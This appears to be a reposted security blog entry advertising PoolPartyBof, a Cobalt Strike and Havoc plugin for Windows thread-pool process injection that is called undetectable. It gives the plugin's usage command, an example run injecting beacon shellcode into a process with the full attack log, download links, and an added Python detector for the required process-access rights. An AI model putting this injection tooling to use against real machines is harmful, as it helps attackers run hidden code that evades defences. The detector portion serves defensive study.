Undetectable process injection BOF plugin

admin · 2023-12-15 08:55:18

Preface

At Black Hat EU 2023, security researcher @Alon Leviev presented a collection of process injection techniques that abuse Windows thread pools and are described as completely undetectable, under the title "The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools". The presentation slides are available at the address below.

https://www.blackhat.com/eu-23/briefings/schedule/#the-pool-party-you-will-never-forget-new-process-injection-techniques-using-windows-thread-pools-35446

Plugin overview

A Beacon Object File (BOF) written by its author on top of the PoolParty process injection technique from @SafeBreach / @0xDeku (abuse of Windows thread pools); it can be used from Havoc and Cobalt Strike.

The BOF currently supports only 5 of the techniques/variants; the author plans to add the remaining variants later:
  • Insert a TP_IO work item into the target process's thread pool.
  • Insert a TP_ALPC work item into the target process's thread pool.
  • Insert a TP_JOB work item into the target process's thread pool.
  • Insert a TP_DIRECT work item into the target process's thread pool.
  • Insert a TP_TIMER work item into the target process's thread pool.

Plugin usage

I only did a quick test on two versions, CS 4.5 (failed) and 4.9 (succeeded); test other versions yourself, or debug it on your own.

PoolPartyBof <Process ID> <Path To Shellcode> <Variant>

Usage example

PoolPartyBof 2136 /tmp/beacon_x64.bin 4
[*] Opening 2136 and running PoolParty with /tmp/beacon_x64.bin shellcode!
[+] host called home, sent: 314020 bytes
[+] received output:
[INFO]   Shellcode Size: 307200 bytes
[+] received output:
[INFO]   Starting PoolParty attack against process id: 2136
[+] received output:
[INFO]   Retrieved handle to the target process: 0000000000000670
[+] received output:
[INFO]   Hijacked worker factory handle from the target process: 000000C96E0FF5B8
[+] received output:
[INFO]   Hijacked timer queue handle from the target process: 000000C96E0FF5B8
[+] received output:
[INFO]   Allocated shellcode memory in the target process: 00000290C91B0000
[+] received output:
[INFO]   Written shellcode to the target process
[+] received output:
[INFO]   Retrieved target worker factory basic information
[+] received output:
[INFO]   Created TP_TIMER structure associated with the shellcode
[+] received output:
[INFO]   Allocated TP_TIMER memory in the target process: 00000290C9200000
[+] received output:
[INFO]   Written the specially crafted TP_TIMER structure to the target process
[+] received output:
[INFO]   Modified the target process's TP_POOL timer queue WindowsStart and Windows End to point to the specially crafted TP_TIMER
[+] received output:
[INFO]   Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[+] received output:
[INFO]   PoolParty attack completed.
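The output above walks through the primitives every variant shares before the thread-pool-specific part: open the target process, duplicate (hijack) a worker factory or timer queue handle out of it, allocate memory in it, and write to it. Those steps need PROCESS_DUP_HANDLE, PROCESS_VM_OPERATION and PROCESS_VM_WRITE on the target, which is something a defender can look for in process-access telemetry. The following is an added example, not code from the BOF or from the original post: a small detector that parses constructed Sysmon-style ProcessAccess (Event ID 10) records and flags a source process that obtains all three rights on another process. The record format, the sample events, the allowlist and the choice of rights to treat as suspicious are this example's own assumptions.

```python
"""
Heuristic detection of the handle-duplication plus remote-write primitives seen in
the PoolParty log: a process opening another process with PROCESS_DUP_HANDLE,
PROCESS_VM_OPERATION and PROCESS_VM_WRITE at the same time.

Added example, not part of the BOF or of the original post. The events below are
CONSTRUCTED, Sysmon-style ProcessAccess (Event ID 10) records in a simple
key=value|key=value format; the rights combination treated as suspicious and the
allowlist are assumptions of this example.
"""
from dataclasses import dataclass

# Windows process access rights (documented constants from winnt.h).
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Rights that together allow a caller to duplicate a handle out of the target
# (DUP_HANDLE), allocate memory in it (VM_OPERATION) and write to it (VM_WRITE).
INJECTION_RIGHTS = PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Assumed allowlist of images that legitimately open other processes this way
# (e.g. a security agent); lower-cased full paths.
DEFAULT_ALLOWLIST = frozenset({r"c:\program files\edr\agent.exe"})


@dataclass
class ProcessAccess:
    source_image: str
    target_image: str
    target_pid: int
    granted_access: int


def parse_event(line: str) -> ProcessAccess:
    """Parse one constructed 'Key=Value|Key=Value' ProcessAccess record."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcessAccess(
        source_image=fields["SourceImage"],
        target_image=fields["TargetImage"],
        target_pid=int(fields["TargetProcessId"]),
        granted_access=int(fields["GrantedAccess"], 16),
    )


def is_suspicious(ev: ProcessAccess, allowlist=DEFAULT_ALLOWLIST) -> bool:
    """True when a non-allowlisted process holds all of INJECTION_RIGHTS on the target."""
    if ev.source_image.lower() in allowlist:
        return False
    return ev.granted_access & INJECTION_RIGHTS == INJECTION_RIGHTS


def scan(lines, allowlist=DEFAULT_ALLOWLIST) -> list:
    """Return the target PIDs of all records that match the heuristic, in order."""
    return [ev.target_pid for ev in map(parse_event, lines) if is_suspicious(ev, allowlist)]


# CONSTRUCTED sample telemetry. Only the first record carries DUP_HANDLE,
# VM_OPERATION and VM_WRITE together from a non-allowlisted image.
SAMPLE_EVENTS = [
    r"SourceImage=C:\Users\user\Downloads\beacon.exe|TargetImage=C:\Windows\System32\notepad.exe"
    r"|TargetProcessId=2136|GrantedAccess=0x1478",
    r"SourceImage=C:\Windows\System32\svchost.exe|TargetImage=C:\Windows\System32\notepad.exe"
    r"|TargetProcessId=2136|GrantedAccess=0x1000",
    r"SourceImage=C:\Program Files\EDR\agent.exe|TargetImage=C:\Windows\System32\notepad.exe"
    r"|TargetProcessId=2136|GrantedAccess=0x1FFFFF",
    r"SourceImage=C:\Windows\System32\Taskmgr.exe|TargetImage=C:\Windows\System32\notepad.exe"
    r"|TargetProcessId=2136|GrantedAccess=0x1410",
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        ev = parse_event(line)
        verdict = "SUSPICIOUS" if is_suspicious(ev) else "ok"
        print(f"{verdict:10} {ev.source_image} -> {ev.target_image} ({ev.target_pid}) "
              f"access=0x{ev.granted_access:X}")
```

The mask check is deliberately coarse: it keys on the rights the recorded steps require rather than on any thread-pool structure, so it also catches other injection methods that duplicate handles and write remote memory, and it needs an allowlist for tooling that legitimately does the same. In real telemetry the GrantedAccess value comes from the event's own field; the sample values here are made up to exercise each branch.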

The BOF can further be combined with the Process Injection Hooks that Cobalt Strike provides; Rastamouse also has an excellent blog post on that.

Havoc BOF support has been added. If you run into problems, you are welcome to open an issue. With Sliver C2 it partly works, but the remote process crashes while executing the shellcode.

Download

https://github.com/0xEr3bus/PoolPartyBof

https://github.com/SafeBreach-Labs/PoolParty


Originally published on the WeChat official account (Hack分享吧): Undetectable process injection BOF plugin

Original link (CN-SEC): http://cn-sec.com/archives/2302180.html